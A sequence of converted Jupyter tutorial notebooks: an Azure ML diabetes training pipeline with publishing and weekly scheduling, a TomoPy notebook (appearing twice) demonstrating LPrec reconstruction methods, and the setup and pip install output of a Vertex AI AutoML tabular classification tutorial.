from sklearn.model_selection import train_test_split
from sklearn.tree import DecisionTreeClassifier
from sklearn.metrics import roc_auc_score
from sklearn.metrics import roc_curve
import matplotlib.pyplot as plt
# Get parameters
parser = argparse.ArgumentParser()
parser.add_argument("--training-data", type=str, dest='training_data', help='training data')
args = parser.parse_args()
training_data = args.training_data
# Get the experiment run context
run = Run.get_context()
# load the prepared data file in the training folder
print("Loading Data...")
file_path = os.path.join(training_data,'data.csv')
diabetes = pd.read_csv(file_path)
# Separate features and labels
X, y = diabetes[['Pregnancies','PlasmaGlucose','DiastolicBloodPressure','TricepsThickness','SerumInsulin','BMI','DiabetesPedigree','Age']].values, diabetes['Diabetic'].values
# Split data into training set and test set
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.30, random_state=0)
# Train adecision tree model
print('Training a decision tree model...')
model = DecisionTreeClassifier().fit(X_train, y_train)
# calculate accuracy
y_hat = model.predict(X_test)
acc = np.average(y_hat == y_test)
print('Accuracy:', acc)
run.log('Accuracy', np.float(acc))
# calculate AUC
y_scores = model.predict_proba(X_test)
auc = roc_auc_score(y_test,y_scores[:,1])
print('AUC: ' + str(auc))
run.log('AUC', np.float(auc))
# plot ROC curve
fpr, tpr, thresholds = roc_curve(y_test, y_scores[:,1])
fig = plt.figure(figsize=(6, 4))
# Plot the diagonal 50% line
plt.plot([0, 1], [0, 1], 'k--')
# Plot the FPR and TPR achieved by our model
plt.plot(fpr, tpr)
plt.xlabel('False Positive Rate')
plt.ylabel('True Positive Rate')
plt.title('ROC Curve')
run.log_image(name = "ROC", plot = fig)
plt.show()
# Save the trained model in the outputs folder
print("Saving model...")
os.makedirs('outputs', exist_ok=True)
model_file = os.path.join('outputs', 'diabetes_model.pkl')
joblib.dump(value=model, filename=model_file)
# Register the model
print('Registering model...')
Model.register(workspace=run.experiment.workspace,
model_path = model_file,
model_name = 'diabetes_model',
tags={'Training context':'Pipeline'},
properties={'AUC': np.float(auc), 'Accuracy': np.float(acc)})
run.complete()
###Output
_____no_output_____
###Markdown
Prepare a compute environment for the pipeline stepsIn this exercise, you'll use the same compute for both steps, but it's important to realize that each step is run independently; so you could specify different compute contexts for each step if appropriate.First, get the compute target you created in a previous lab (if it doesn't exist, it will be created).> **Important**: Change *your-compute-cluster* to the name of your compute cluster in the code below before running it! Cluster names must be globally unique names between 2 to 16 characters in length. Valid characters are letters, digits, and the - character.
###Code
from azureml.core.compute import ComputeTarget, AmlCompute
from azureml.core.compute_target import ComputeTargetException
cluster_name = "your-compute-cluster"
try:
# Check for existing compute target
pipeline_cluster = ComputeTarget(workspace=ws, name=cluster_name)
print('Found existing cluster, use it.')
except ComputeTargetException:
# If it doesn't already exist, create it
try:
compute_config = AmlCompute.provisioning_configuration(vm_size='STANDARD_DS11_V2', max_nodes=2)
pipeline_cluster = ComputeTarget.create(ws, cluster_name, compute_config)
pipeline_cluster.wait_for_completion(show_output=True)
except Exception as ex:
print(ex)
###Output
_____no_output_____
###Markdown
> **Note**: Compute instances and clusters are based on standard Azure virtual machine images. For this exercise, the *Standard_DS11_v2* image is recommended to achieve the optimal balance of cost and performance. If your subscription has a quota that does not include this image, choose an alternative image; but bear in mind that a larger image may incur higher cost and a smaller image may not be sufficient to complete the tasks. Alternatively, ask your Azure administrator to extend your quota.The compute will require a Python environment with the necessary package dependencies installed.
###Code
%%writefile $experiment_folder/experiment_env.yml
name: experiment_env
dependencies:
- python=3.6.2
- scikit-learn
- ipykernel
- matplotlib
- pandas
- pip
- pip:
- azureml-defaults
- pyarrow
###Output
_____no_output_____
###Markdown
Now that you have a Conda configuration file, you can create an environment and use it in the run configuration for the pipeline.
###Code
from azureml.core import Environment
from azureml.core.runconfig import RunConfiguration
# Create a Python environment for the experiment (from a .yml file)
experiment_env = Environment.from_conda_specification("experiment_env", experiment_folder + "/experiment_env.yml")
# Register the environment
experiment_env.register(workspace=ws)
registered_env = Environment.get(ws, 'experiment_env')
# Create a new runconfig object for the pipeline
pipeline_run_config = RunConfiguration()
# Use the compute you created above.
pipeline_run_config.target = pipeline_cluster
# Assign the environment to the run configuration
pipeline_run_config.environment = registered_env
print ("Run configuration created.")
###Output
_____no_output_____
###Markdown
Create and run a pipelineNow you're ready to create and run a pipeline.First you need to define the steps for the pipeline, and any data references that need to be passed between them. In this case, the first step must write the prepared data to a folder that can be read from by the second step. Since the steps will be run on remote compute (and in fact, could each be run on different compute), the folder path must be passed as a data reference to a location in a datastore within the workspace. The **OutputFileDatasetConfig** object is a special kind of data reference that is used for interim storage locations that can be passed between pipeline steps, so you'll create one and use at as the output for the first step and the input for the second step. Note that you need to pass it as a script argument so your code can access the datastore location referenced by the data reference.
###Code
from azureml.data import OutputFileDatasetConfig
from azureml.pipeline.steps import PythonScriptStep
# Get the training dataset
diabetes_ds = ws.datasets.get("diabetes dataset")
# Create an OutputFileDatasetConfig (temporary Data Reference) for data passed from step 1 to step 2
prepped_data = OutputFileDatasetConfig("prepped_data")
# Step 1, Run the data prep script
prep_step = PythonScriptStep(name = "Prepare Data",
source_directory = experiment_folder,
script_name = "prep_diabetes.py",
arguments = ['--input-data', diabetes_ds.as_named_input('raw_data'),
'--prepped-data', prepped_data],
compute_target = pipeline_cluster,
runconfig = pipeline_run_config,
allow_reuse = True)
# Step 2, run the training script
train_step = PythonScriptStep(name = "Train and Register Model",
source_directory = experiment_folder,
script_name = "train_diabetes.py",
arguments = ['--training-data', prepped_data.as_input()],
compute_target = pipeline_cluster,
runconfig = pipeline_run_config,
allow_reuse = True)
print("Pipeline steps defined")
###Output
_____no_output_____
###Markdown
OK, you're ready build the pipeline from the steps you've defined and run it as an experiment.
###Code
from azureml.core import Experiment
from azureml.pipeline.core import Pipeline
from azureml.widgets import RunDetails
# Construct the pipeline
pipeline_steps = [prep_step, train_step]
pipeline = Pipeline(workspace=ws, steps=pipeline_steps)
print("Pipeline is built.")
# Create an experiment and run the pipeline
experiment = Experiment(workspace=ws, name = 'mslearn-diabetes-pipeline')
pipeline_run = experiment.submit(pipeline, regenerate_outputs=True)
print("Pipeline submitted for execution.")
RunDetails(pipeline_run).show()
pipeline_run.wait_for_completion(show_output=True)
###Output
_____no_output_____
###Markdown
A graphical representation of the pipeline experiment will be displayed in the widget as it runs. Keep an eye on the kernel indicator at the top right of the page, when it turns from **&9899;** to **&9711;**, the code has finished running. You can also monitor pipeline runs in the **Experiments** page in [Azure Machine Learning studio](https://ml.azure.com).When the pipeline has finished, you can examine the metrics recorded by it's child runs.
###Code
for run in pipeline_run.get_children():
print(run.name, ':')
metrics = run.get_metrics()
for metric_name in metrics:
print('\t',metric_name, ":", metrics[metric_name])
###Output
_____no_output_____
###Markdown
Assuming the pipeline was successful, a new model should be registered with a *Training context* tag indicating it was trained in a pipeline. Run the following code to verify this.
###Code
from azureml.core import Model
for model in Model.list(ws):
print(model.name, 'version:', model.version)
for tag_name in model.tags:
tag = model.tags[tag_name]
print ('\t',tag_name, ':', tag)
for prop_name in model.properties:
prop = model.properties[prop_name]
print ('\t',prop_name, ':', prop)
print('\n')
###Output
_____no_output_____
###Markdown
Publish the pipelineAfter you've created and tested a pipeline, you can publish it as a REST service.
###Code
# Publish the pipeline from the run
published_pipeline = pipeline_run.publish_pipeline(
name="diabetes-training-pipeline", description="Trains diabetes model", version="1.0")
published_pipeline
###Output
_____no_output_____
###Markdown
Note that the published pipeline has an endpoint, which you can see in the **Endpoints** page (on the **Pipeline Endpoints** tab) in [Azure Machine Learning studio](https://ml.azure.com). You can also find its URI as a property of the published pipeline object:
###Code
rest_endpoint = published_pipeline.endpoint
print(rest_endpoint)
###Output
_____no_output_____
###Markdown
Call the pipeline endpointTo use the endpoint, client applications need to make a REST call over HTTP. This request must be authenticated, so an authorization header is required. A real application would require a service principal with which to be authenticated, but to test this out, we'll use the authorization header from your current connection to your Azure workspace, which you can get using the following code:
###Code
from azureml.core.authentication import InteractiveLoginAuthentication
interactive_auth = InteractiveLoginAuthentication()
auth_header = interactive_auth.get_authentication_header()
print("Authentication header ready.")
###Output
_____no_output_____
###Markdown
Now we're ready to call the REST interface. The pipeline runs asynchronously, so we'll get an identifier back, which we can use to track the pipeline experiment as it runs:
###Code
import requests
experiment_name = 'mslearn-diabetes-pipeline'
rest_endpoint = published_pipeline.endpoint
response = requests.post(rest_endpoint,
headers=auth_header,
json={"ExperimentName": experiment_name})
run_id = response.json()["Id"]
run_id
###Output
_____no_output_____
###Markdown
Since you have the run ID, you can use it to wait for the run to complete.> **Note**: The pipeline should complete quickly, because each step was configured to allow output reuse. This was done primarily for convenience and to save time in this course. In reality, you'd likely want the first step to run every time in case the data has changed, and trigger the subsequent steps only if the output from step one changes.
###Code
from azureml.pipeline.core.run import PipelineRun
published_pipeline_run = PipelineRun(ws.experiments[experiment_name], run_id)
published_pipeline_run.wait_for_completion(show_output=True)
###Output
_____no_output_____
###Markdown
Schedule the PipelineSuppose the clinic for the diabetes patients collects new data each week, and adds it to the dataset. You could run the pipeline every week to retrain the model with the new data.
###Code
from azureml.pipeline.core import ScheduleRecurrence, Schedule
# Submit the Pipeline every Monday at 00:00 UTC
recurrence = ScheduleRecurrence(frequency="Week", interval=1, week_days=["Monday"], time_of_day="00:00")
weekly_schedule = Schedule.create(ws, name="weekly-diabetes-training",
description="Based on time",
pipeline_id=published_pipeline.id,
experiment_name='mslearn-diabetes-pipeline',
recurrence=recurrence)
print('Pipeline scheduled.')
###Output
_____no_output_____
###Markdown
You can retrieve the schedules that are defined in the workspace like this:
###Code
schedules = Schedule.list(ws)
schedules
###Output
_____no_output_____
###Markdown
You can check the latest run like this:
###Code
pipeline_experiment = ws.experiments.get('mslearn-diabetes-pipeline')
latest_run = list(pipeline_experiment.get_runs())[0]
latest_run.get_details()
###Output
_____no_output_____ |
doc/source/ipynb/lprec.ipynb | ###Markdown
TomoPy with LPrecHere is an example on how to use the [log-polar based method](https://github.com/math-vrn/lprec) for reconstruction with TomoPy.To reconstruct the image with the LPrec instead of TomoPy, change the ``algorithm`` keyword to ``tomopy.lprec``. Specify which LPrec algorithm to reconstruct with the ``lpmethod`` keyword. These two cells are an abbreviated setup for [Reconstruction with TomoPy](tomopy.rst).
###Code
import dxchange
import matplotlib.pyplot as plt
import tomopy
proj, flat, dark, theta = dxchange.read_aps_32id(
fname='../../../source/tomopy/data/tooth.h5',
sino=(0, 2),
)
proj = tomopy.normalize(proj, flat, dark)
rot_center = 296
###Output
_____no_output_____
###Markdown
Note that with LPrec, there can be no negative values after the transmission tomography linearization:
###Code
proj = tomopy.minus_log(proj)
proj[proj < 0] = 0 # no values less than zero with lprec
###Output
_____no_output_____
###Markdown
Reconstruction using FBP method with the log-polar coordinates.$$ \hat{f}=\mathcal{W}\mathcal{R}^* g $$
###Code
recon = tomopy.recon(proj,
theta,
center=rot_center,
algorithm=tomopy.lprec,
lpmethod='fbp',
filter_name='parzen')
recon = tomopy.circ_mask(recon, axis=0, ratio=0.95)
plt.imshow(recon[0, :, :])
plt.show()
###Output
Reconstructing 48 slice groups with 2 master threads...
###Markdown
Reconstruction using the gradient descent method with the log-polar coordinates.$$ \hat{f} = \text{argmin}_f\lVert\mathcal{R}f-g \rVert_2^2 $$
###Code
recon = tomopy.recon(proj,
theta,
center=rot_center,
algorithm=tomopy.lprec,
lpmethod='grad',
ncore=1,
num_iter=64,
reg_par=-1)
recon = tomopy.circ_mask(recon, axis=0, ratio=0.95)
plt.imshow(recon[0, :, :])
plt.show()
###Output
Reconstructing 1 slice groups with 1 master threads...
###Markdown
Reconstruction using the conjugate gradient method with the log-polar coordinates.$$ \hat{f} = \text{argmin}_f\lVert\mathcal{R}f-g \rVert_2^2 $$
###Code
recon = tomopy.recon(proj,
theta,
center=rot_center,
algorithm=tomopy.lprec,
lpmethod='cg',
ncore=1,
num_iter=16,
reg_par=-1)
recon = tomopy.circ_mask(recon, axis=0, ratio=0.95)
plt.imshow(recon[0, :, :])
plt.show()
###Output
Reconstructing 1 slice groups with 1 master threads...
###Markdown
Reconstruction using the TV method with the log-polar coordinates. It gives piecewise constant reconstructions and can be used for denoising.$$ \hat{f} = \text{argmin}_f\lVert\mathcal{R}f-g \rVert_2^2 + \lambda \lVert\nabla f\rVert_1 $$
###Code
recon = tomopy.recon(proj,
theta,
center=rot_center,
algorithm=tomopy.lprec,
lpmethod='tv',
ncore=1,
num_iter=512,
reg_par=5e-4)
recon = tomopy.circ_mask(recon, axis=0, ratio=0.95)
plt.imshow(recon[0, :, :])
plt.show()
###Output
Reconstructing 1 slice groups with 1 master threads...
###Markdown
Reconstruction using the TV-entropy method with the log-polar coordinates. It can be used for suppressing Poisson noise.$$ \hat{f} = \text{argmin}_f \lambda \lVert\nabla f\rVert_1+\int_\Omega\mathcal{R}f-g\log(\mathcal{R}f)df $$
###Code
recon = tomopy.recon(proj,
theta,
center=rot_center,
algorithm=tomopy.lprec,
lpmethod='tve',
ncore=1,
num_iter=512,
reg_par=2e-4)
recon = tomopy.circ_mask(recon, axis=0, ratio=0.95)
plt.imshow(recon[0, :, :])
plt.show()
###Output
Reconstructing 1 slice groups with 1 master threads...
###Markdown
Reconstruction using the TV-l1 method with the log-polar coordinates. It can be used to removestructures of an image of a certain scale, and the regularization parameter $\lambda$ can be used for scale selection. $$ \hat{f} = \text{argmin}_f\lVert\mathcal{R}f-g \rVert_1 + \lambda \lVert\nabla f\rVert_1 $$
###Code
recon = tomopy.recon(proj,
theta,
center=rot_center,
algorithm=tomopy.lprec,
lpmethod='tvl1',
ncore=1,
num_iter=512,
reg_par=3e-2)
recon = tomopy.circ_mask(recon, axis=0, ratio=0.95)
plt.imshow(recon[0, :, :])
plt.show()
###Output
Reconstructing 1 slice groups with 1 master threads...
###Markdown
Reconstruction using the MLEM method with the log-polar coordinates.
###Code
recon = tomopy.recon(proj,
theta,
center=rot_center,
algorithm=tomopy.lprec,
lpmethod='em',
ncore=1,
num_iter=64,
reg_par=0.05)
recon = tomopy.circ_mask(recon, axis=0, ratio=0.95)
plt.imshow(recon[0, :, :])
plt.show()
###Output
Reconstructing 1 slice groups with 1 master threads...
###Markdown
Reconstruction using the MLEM method with the log-polar coordinates.
###Code
recon = tomopy.recon(proj,
theta,
center=rot_center,
algorithm=tomopy.lprec,
lpmethod='em',
ncore=1,
num_iter=64,
reg_par=0.05)
recon = tomopy.circ_mask(recon, axis=0, ratio=0.95)
plt.imshow(recon[0, :, :])
plt.show()
###Output
Reconstructing 1 slice groups with 1 master threads...
###Markdown
TomoPy with LPrecHere is an example on how to use the [log-polar based method](https://github.com/math-vrn/lprec) for reconstruction with TomoPy.To reconstruct the image with the LPrec instead of TomoPy, change the ``algorithm`` keyword to ``tomopy.lprec``. Specify which LPrec algorithm to reconstruct with the ``lpmethod`` keyword. These two cells are an abbreviated setup for [Reconstruction with TomoPy](tomopy.rst).
###Code
import dxchange
import matplotlib.pyplot as plt
import tomopy
proj, flat, dark, theta = dxchange.read_aps_32id(
fname='../../source/tomopy/data/tooth.h5',
sino=(0, 2),
)
proj = tomopy.normalize(proj, flat, dark)
rot_center = 296
###Output
_____no_output_____
###Markdown
Note that with LPrec, there can be no negative values after the transmission tomography linearization:
###Code
proj = tomopy.minus_log(proj)
proj[proj < 0] = 0 # no values less than zero with lprec
###Output
_____no_output_____
###Markdown
Reconstruction using FBP method with the log-polar coordinates.$$ \hat{f}=\mathcal{W}\mathcal{R}^* g $$
###Code
recon = tomopy.recon(proj,
theta,
center=rot_center,
algorithm=tomopy.lprec,
lpmethod='fbp',
filter_name='parzen')
recon = tomopy.circ_mask(recon, axis=0, ratio=0.95)
plt.imshow(recon[0, :, :])
plt.show()
###Output
Reconstructing 48 slice groups with 2 master threads...
###Markdown
Reconstruction using the gradient descent method with the log-polar coordinates.$$ \hat{f} = \text{argmin}_f\lVert\mathcal{R}f-g \rVert_2^2 $$
###Code
recon = tomopy.recon(proj,
theta,
center=rot_center,
algorithm=tomopy.lprec,
lpmethod='grad',
ncore=1,
num_iter=64,
reg_par=-1)
recon = tomopy.circ_mask(recon, axis=0, ratio=0.95)
plt.imshow(recon[0, :, :])
plt.show()
###Output
Reconstructing 1 slice groups with 1 master threads...
###Markdown
Reconstruction using the conjugate gradient method with the log-polar coordinates.$$ \hat{f} = \text{argmin}_f\lVert\mathcal{R}f-g \rVert_2^2 $$
###Code
recon = tomopy.recon(proj,
theta,
center=rot_center,
algorithm=tomopy.lprec,
lpmethod='cg',
ncore=1,
num_iter=16,
reg_par=-1)
recon = tomopy.circ_mask(recon, axis=0, ratio=0.95)
plt.imshow(recon[0, :, :])
plt.show()
###Output
Reconstructing 1 slice groups with 1 master threads...
###Markdown
Reconstruction using the TV method with the log-polar coordinates. It gives piecewise constant reconstructions and can be used for denoising.$$ \hat{f} = \text{argmin}_f\lVert\mathcal{R}f-g \rVert_2^2 + \lambda \lVert\nabla f\rVert_1 $$
###Code
recon = tomopy.recon(proj,
theta,
center=rot_center,
algorithm=tomopy.lprec,
lpmethod='tv',
ncore=1,
num_iter=512,
reg_par=5e-4)
recon = tomopy.circ_mask(recon, axis=0, ratio=0.95)
plt.imshow(recon[0, :, :])
plt.show()
###Output
Reconstructing 1 slice groups with 1 master threads...
###Markdown
Reconstruction using the TV-entropy method with the log-polar coordinates. It can be used for suppressing Poisson noise.$$ \hat{f} = \text{argmin}_f \lambda \lVert\nabla f\rVert_1+\int_\Omega\mathcal{R}f-g\log(\mathcal{R}f)df $$
###Code
recon = tomopy.recon(proj,
theta,
center=rot_center,
algorithm=tomopy.lprec,
lpmethod='tve',
ncore=1,
num_iter=512,
reg_par=2e-4)
recon = tomopy.circ_mask(recon, axis=0, ratio=0.95)
plt.imshow(recon[0, :, :])
plt.show()
###Output
Reconstructing 1 slice groups with 1 master threads...
###Markdown
Reconstruction using the TV-l1 method with the log-polar coordinates. It can be used to removestructures of an image of a certain scale, and the regularization parameter $\lambda$ can be used for scale selection. $$ \hat{f} = \text{argmin}_f\lVert\mathcal{R}f-g \rVert_1 + \lambda \lVert\nabla f\rVert_1 $$
###Code
recon = tomopy.recon(proj,
theta,
center=rot_center,
algorithm=tomopy.lprec,
lpmethod='tvl1',
ncore=1,
num_iter=512,
reg_par=3e-2)
recon = tomopy.circ_mask(recon, axis=0, ratio=0.95)
plt.imshow(recon[0, :, :])
plt.show()
###Output
Reconstructing 1 slice groups with 1 master threads...
|
courses/machine_learning/deepdive2/launching_into_ml/solutions/automl-tabular-classification.ipynb | ###Markdown
Vertex AI Model Builder SDK: AutoML Tabular Training and Prediction OverviewThis tutorial demonstrates how to use the Vertex AI Python client library to train and deploy a tabular classification model for online prediction. Learning ObjectiveIn this notebook, you learn how to:* Create a Vertex AI model training job.* Train an AutoML Tabular model.* Deploy the `Model` resource to a serving `Endpoint` resource.* Make a prediction by sending data.* Undeploy the `Model` resource. IntroductionThis notebook demonstrates, using the Vertex AI Python client library, how to train and make predictions on an AutoML model based on a tabular dataset. Alternatively, you can train and make predictions on models by using the gcloud command-line tool or by using the online Cloud Console.Each learning objective will correspond to a __TODO__ in this student lab notebook -- try to complete this notebook first and then review the [solution notebook](../solutions/automl-tabular-classification.ipynb). **Make sure to enable the Vertex AI API and Compute Engine API.** Installation
###Code
import os
# The Google Cloud Notebook product has specific requirements
IS_GOOGLE_CLOUD_NOTEBOOK = os.path.exists("/opt/deeplearning/metadata/env_version")
USER_FLAG = ""
# Google Cloud Notebook requires dependencies to be installed with '--user'
if IS_GOOGLE_CLOUD_NOTEBOOK:
USER_FLAG = "--user"
###Output
_____no_output_____
###Markdown
Install the latest version of the Vertex AI client library.Run the following command in your virtual environment to install the Vertex SDK for Python:
###Code
! pip install {USER_FLAG} --upgrade google-cloud-aiplatform
###Output
Requirement already satisfied: google-cloud-aiplatform in /opt/conda/lib/python3.7/site-packages (1.1.1)
Collecting google-cloud-aiplatform
Downloading google_cloud_aiplatform-1.3.0-py2.py3-none-any.whl (1.3 MB)
[K |████████████████████████████████| 1.3 MB 7.6 MB/s eta 0:00:01
[?25hRequirement already satisfied: proto-plus>=1.10.1 in /opt/conda/lib/python3.7/site-packages (from google-cloud-aiplatform) (1.19.0)
Requirement already satisfied: google-cloud-bigquery<3.0.0dev,>=1.15.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-aiplatform) (2.23.2)
Requirement already satisfied: google-api-core[grpc]<3.0.0dev,>=1.26.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-aiplatform) (1.31.1)
Requirement already satisfied: google-cloud-storage<2.0.0dev,>=1.32.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-aiplatform) (1.41.1)
Requirement already satisfied: packaging>=14.3 in /opt/conda/lib/python3.7/site-packages (from google-cloud-aiplatform) (21.0)
Requirement already satisfied: googleapis-common-protos<2.0dev,>=1.6.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (1.53.0)
Requirement already satisfied: protobuf>=3.12.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (3.16.0)
Requirement already satisfied: six>=1.13.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (1.16.0)
Requirement already satisfied: pytz in /opt/conda/lib/python3.7/site-packages (from google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (2021.1)
Requirement already satisfied: google-auth<2.0dev,>=1.25.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (1.34.0)
Requirement already satisfied: requests<3.0.0dev,>=2.18.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (2.25.1)
Requirement already satisfied: setuptools>=40.3.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (49.6.0.post20210108)
Requirement already satisfied: grpcio<2.0dev,>=1.29.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (1.38.1)
Requirement already satisfied: rsa<5,>=3.1.4 in /opt/conda/lib/python3.7/site-packages (from google-auth<2.0dev,>=1.25.0->google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (4.7.2)
Requirement already satisfied: cachetools<5.0,>=2.0.0 in /opt/conda/lib/python3.7/site-packages (from google-auth<2.0dev,>=1.25.0->google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (4.2.2)
Requirement already satisfied: pyasn1-modules>=0.2.1 in /opt/conda/lib/python3.7/site-packages (from google-auth<2.0dev,>=1.25.0->google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (0.2.7)
Requirement already satisfied: google-resumable-media<3.0dev,>=0.6.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-bigquery<3.0.0dev,>=1.15.0->google-cloud-aiplatform) (1.3.2)
Requirement already satisfied: google-cloud-core<3.0.0dev,>=1.4.1 in /opt/conda/lib/python3.7/site-packages (from google-cloud-bigquery<3.0.0dev,>=1.15.0->google-cloud-aiplatform) (1.7.2)
Requirement already satisfied: google-crc32c<2.0dev,>=1.0 in /opt/conda/lib/python3.7/site-packages (from google-resumable-media<3.0dev,>=0.6.0->google-cloud-bigquery<3.0.0dev,>=1.15.0->google-cloud-aiplatform) (1.1.2)
Requirement already satisfied: cffi>=1.0.0 in /opt/conda/lib/python3.7/site-packages (from google-crc32c<2.0dev,>=1.0->google-resumable-media<3.0dev,>=0.6.0->google-cloud-bigquery<3.0.0dev,>=1.15.0->google-cloud-aiplatform) (1.14.6)
Requirement already satisfied: pycparser in /opt/conda/lib/python3.7/site-packages (from cffi>=1.0.0->google-crc32c<2.0dev,>=1.0->google-resumable-media<3.0dev,>=0.6.0->google-cloud-bigquery<3.0.0dev,>=1.15.0->google-cloud-aiplatform) (2.20)
Requirement already satisfied: pyparsing>=2.0.2 in /opt/conda/lib/python3.7/site-packages (from packaging>=14.3->google-cloud-aiplatform) (2.4.7)
Requirement already satisfied: pyasn1<0.5.0,>=0.4.6 in /opt/conda/lib/python3.7/site-packages (from pyasn1-modules>=0.2.1->google-auth<2.0dev,>=1.25.0->google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (0.4.8)
Requirement already satisfied: certifi>=2017.4.17 in /opt/conda/lib/python3.7/site-packages (from requests<3.0.0dev,>=2.18.0->google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (2021.5.30)
Requirement already satisfied: urllib3<1.27,>=1.21.1 in /opt/conda/lib/python3.7/site-packages (from requests<3.0.0dev,>=2.18.0->google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (1.26.6)
Requirement already satisfied: chardet<5,>=3.0.2 in /opt/conda/lib/python3.7/site-packages (from requests<3.0.0dev,>=2.18.0->google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (4.0.0)
Requirement already satisfied: idna<3,>=2.5 in /opt/conda/lib/python3.7/site-packages (from requests<3.0.0dev,>=2.18.0->google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (2.10)
Installing collected packages: google-cloud-aiplatform
[33m WARNING: The script tb-gcp-uploader is installed in '/home/jupyter/.local/bin' which is not on PATH.
Consider adding this directory to PATH or, if you prefer to suppress this warning, use --no-warn-script-location.[0m
Successfully installed google-cloud-aiplatform-1.3.0
###Markdown
Install the Cloud Storage library:
###Code
! pip install {USER_FLAG} --upgrade google-cloud-storage
###Output
Requirement already satisfied: google-cloud-storage in /opt/conda/lib/python3.7/site-packages (1.41.1)
Collecting google-cloud-storage
Downloading google_cloud_storage-1.42.0-py2.py3-none-any.whl (105 kB)
[K |████████████████████████████████| 105 kB 8.1 MB/s eta 0:00:01
[?25hRequirement already satisfied: google-resumable-media<3.0dev,>=1.3.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-storage) (1.3.2)
Requirement already satisfied: google-auth<3.0dev,>=1.25.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-storage) (1.34.0)
Requirement already satisfied: google-cloud-core<3.0dev,>=1.6.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-storage) (1.7.2)
Requirement already satisfied: google-api-core<3.0dev,>=1.29.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-storage) (1.31.1)
Requirement already satisfied: requests<3.0.0dev,>=2.18.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-storage) (2.25.1)
Requirement already satisfied: packaging>=14.3 in /opt/conda/lib/python3.7/site-packages (from google-api-core<3.0dev,>=1.29.0->google-cloud-storage) (21.0)
Requirement already satisfied: protobuf>=3.12.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core<3.0dev,>=1.29.0->google-cloud-storage) (3.16.0)
Requirement already satisfied: six>=1.13.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core<3.0dev,>=1.29.0->google-cloud-storage) (1.16.0)
Requirement already satisfied: pytz in /opt/conda/lib/python3.7/site-packages (from google-api-core<3.0dev,>=1.29.0->google-cloud-storage) (2021.1)
Requirement already satisfied: googleapis-common-protos<2.0dev,>=1.6.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core<3.0dev,>=1.29.0->google-cloud-storage) (1.53.0)
Requirement already satisfied: setuptools>=40.3.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core<3.0dev,>=1.29.0->google-cloud-storage) (49.6.0.post20210108)
Requirement already satisfied: cachetools<5.0,>=2.0.0 in /opt/conda/lib/python3.7/site-packages (from google-auth<3.0dev,>=1.25.0->google-cloud-storage) (4.2.2)
Requirement already satisfied: pyasn1-modules>=0.2.1 in /opt/conda/lib/python3.7/site-packages (from google-auth<3.0dev,>=1.25.0->google-cloud-storage) (0.2.7)
Requirement already satisfied: rsa<5,>=3.1.4 in /opt/conda/lib/python3.7/site-packages (from google-auth<3.0dev,>=1.25.0->google-cloud-storage) (4.7.2)
Requirement already satisfied: google-crc32c<2.0dev,>=1.0 in /opt/conda/lib/python3.7/site-packages (from google-resumable-media<3.0dev,>=1.3.0->google-cloud-storage) (1.1.2)
Requirement already satisfied: cffi>=1.0.0 in /opt/conda/lib/python3.7/site-packages (from google-crc32c<2.0dev,>=1.0->google-resumable-media<3.0dev,>=1.3.0->google-cloud-storage) (1.14.6)
Requirement already satisfied: pycparser in /opt/conda/lib/python3.7/site-packages (from cffi>=1.0.0->google-crc32c<2.0dev,>=1.0->google-resumable-media<3.0dev,>=1.3.0->google-cloud-storage) (2.20)
Requirement already satisfied: pyparsing>=2.0.2 in /opt/conda/lib/python3.7/site-packages (from packaging>=14.3->google-api-core<3.0dev,>=1.29.0->google-cloud-storage) (2.4.7)
Requirement already satisfied: pyasn1<0.5.0,>=0.4.6 in /opt/conda/lib/python3.7/site-packages (from pyasn1-modules>=0.2.1->google-auth<3.0dev,>=1.25.0->google-cloud-storage) (0.4.8)
Requirement already satisfied: urllib3<1.27,>=1.21.1 in /opt/conda/lib/python3.7/site-packages (from requests<3.0.0dev,>=2.18.0->google-cloud-storage) (1.26.6)
Requirement already satisfied: idna<3,>=2.5 in /opt/conda/lib/python3.7/site-packages (from requests<3.0.0dev,>=2.18.0->google-cloud-storage) (2.10)
Requirement already satisfied: certifi>=2017.4.17 in /opt/conda/lib/python3.7/site-packages (from requests<3.0.0dev,>=2.18.0->google-cloud-storage) (2021.5.30)
Requirement already satisfied: chardet<5,>=3.0.2 in /opt/conda/lib/python3.7/site-packages (from requests<3.0.0dev,>=2.18.0->google-cloud-storage) (4.0.0)
